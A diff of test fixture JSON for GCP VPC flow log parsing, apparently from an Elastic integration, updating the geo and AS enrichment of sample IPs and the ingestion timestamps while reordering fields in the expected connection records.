 "source": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 33558,
@@ -5113,7 +5339,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.391432100Z",
+ "ingested": "2021-12-14T14:43:27.415198165Z",
 "original": "{\"insertId\":\"1ulp77rfdvho5y\",\"jsonPayload\":{\"bytes_sent\":\"60335\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.538257098Z\",\"packets_sent\":\"353\",\"reporter\":\"DEST\",\"rtt_msec\":\"144\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:58.492572765Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:39:58.492572765Z",
@@ -5129,11 +5355,16 @@
 },
 "destination": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 15169
+ "number": 35908
 },
 "address": "67.43.156.14",
 "port": 9200,
@@ -5211,7 +5442,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-09T13:37:46.391437100Z",
+ "ingested": "2021-12-14T14:43:27.415198558Z",
 "original": "{\"insertId\":\"1ulp77rfdvho6a\",\"jsonPayload\":{\"bytes_sent\":\"65565\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565451051Z\",\"packets_sent\":\"354\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147072949Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:05.147072949Z",
@@ -5222,9 +5453,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:11.981Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 89 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -5233,13 +5494,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65271, 
@@ -5247,6 +5511,16 @@ "ip": "67.43.156.13", "packets": 717 }, + "event": { + "ingested": "2021-12-14T14:43:27.415198948Z", + "original": "{\"insertId\":\"1ulp77rfdvho4v\",\"jsonPayload\":{\"bytes_sent\":\"70174\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65271},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"717\",\"reporter\":\"DEST\",\"rtt_msec\":\"89\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.155378070Z", + "end": "2019-06-14T03:49:55.318940798Z", + "id": "1ulp77rfdvho4v", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -5258,17 +5532,22 @@ "iana_number": "6", "packets": 717, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:11.981Z", + } + }, + { + "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ "67.43.156.13", - "10.139.99.242" + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -5285,25 +5564,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 89 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391441700Z", - "original": "{\"insertId\":\"1ulp77rfdvho4v\",\"jsonPayload\":{\"bytes_sent\":\"70174\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65271},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.318940798Z\",\"packets_sent\":\"717\",\"reporter\":\"DEST\",\"rtt_msec\":\"89\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.155378070Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.155378070Z", - "end": "2019-06-14T03:49:55.318940798Z", - "id": "1ulp77rfdvho4v", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -5312,11 +5576,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34178, 
@@ -5324,6 +5593,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415199372Z", + "original": "{\"insertId\":\"bnj3cofh3cdk1\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34178},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:51.237256499Z", + "end": "2019-06-14T03:46:51.355687385Z", + "id": "bnj3cofh3cdk1", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -5335,17 +5614,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", + "67.43.156.14", "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -5366,21 +5650,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391445500Z", - "original": "{\"insertId\":\"bnj3cofh3cdk1\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34178},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:51.237256499Z", - "end": "2019-06-14T03:46:51.355687385Z", - "id": "bnj3cofh3cdk1", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -5389,11 +5658,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 33602, 
@@ -5401,6 +5675,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415199764Z", + "original": "{\"insertId\":\"bnj3cofh3cdjx\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33602},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:45:50.954948790Z", + "end": "2019-06-14T03:45:51.090104692Z", + "id": "bnj3cofh3cdjx", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -5412,46 +5696,6 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:13.921Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "67.43.156.14", - "10.87.40.76" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391450100Z", - "original": "{\"insertId\":\"bnj3cofh3cdjx\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33602},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:45:50.954948790Z", - "end": "2019-06-14T03:45:51.090104692Z", - "id": "bnj3cofh3cdjx", - "category": "network", - "type": "connection" } }, { 
@@ -5466,11 +5710,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33554, @@ -5542,7 +5791,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391454100Z", + "ingested": "2021-12-14T14:43:27.415200263Z", "original": "{\"insertId\":\"bnj3cofh3cdju\",\"jsonPayload\":{\"bytes_sent\":\"66736\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"366\",\"reporter\":\"DEST\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143837873Z", 
@@ -5553,41 +5802,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 33602, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1776, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Gt7dopsBY+UOS/rgstf7QtnWxMI=", - "bytes": 1776, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -5598,6 +5812,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -5618,8 +5835,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 33602, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1776, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391458200Z", + "ingested": "2021-12-14T14:43:27.415200718Z", "original": "{\"insertId\":\"bnj3cofh3cdjz\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33602,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:51.090104692Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:50.954948790Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:45:50.954948790Z", 
@@ -5627,44 +5869,21 @@ "id": "bnj3cofh3cdjz", "category": "network", "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 52454, - "bytes": 1464, - "ip": "67.43.156.13", - "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:WoYlUsEVcZcFfg615Q+r2a53t50=", - "bytes": 1464, + "community_id": "1:Gt7dopsBY+UOS/rgstf7QtnWxMI=", + "bytes": 1776, "transport": "tcp", "type": "ipv4", "iana_number": "6", "packets": 7, - "direction": "inbound" - }, + "direction": "outbound" + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -5675,6 +5894,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -5695,8 +5917,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 52454, + "bytes": 1464, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391462100Z", + "ingested": "2021-12-14T14:43:27.415201160Z", "original": "{\"insertId\":\"bnj3cofh3cdkk\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52454},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:40.888804332Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:40.779893091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:40.779893091Z", 
@@ -5704,6 +5951,18 @@ "id": "bnj3cofh3cdkk", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:WoYlUsEVcZcFfg615Q+r2a53t50=", + "bytes": 1464, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -5718,11 +5977,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -5794,7 +6058,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391465500Z", + "ingested": "2021-12-14T14:43:27.415201599Z", "original": "{\"insertId\":\"bnj3cofh3cdk0\",\"jsonPayload\":{\"bytes_sent\":\"259510\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075756033Z", 
@@ -5805,57 +6069,25 @@ } }, { + "@timestamp": "2019-06-14T03:50:13.921Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.13" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 52260, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1781, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:jQQ6l4o1MZQiUFoVCT++dIYahM8=", - "bytes": 1781, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:13.921Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } }, "source": { "vpc": { 
@@ -5870,8 +6102,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 52260, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1781, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391469700Z", + "ingested": "2021-12-14T14:43:27.415202431Z", "original": 